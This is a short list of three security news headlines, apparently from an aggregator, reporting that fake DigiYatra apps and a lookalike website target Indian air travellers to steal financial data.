  • gbhackers.com: Fake DigiYatra Apps Target Indian Users to Steal Financial Data
  • infosecwriteups.com: Fake DigiYatra Website Was Targeting Indian Flyers With Lookalike Portal
  • malware.news: Fake DigiYatra Apps Target Indian Users to Steal Financial Data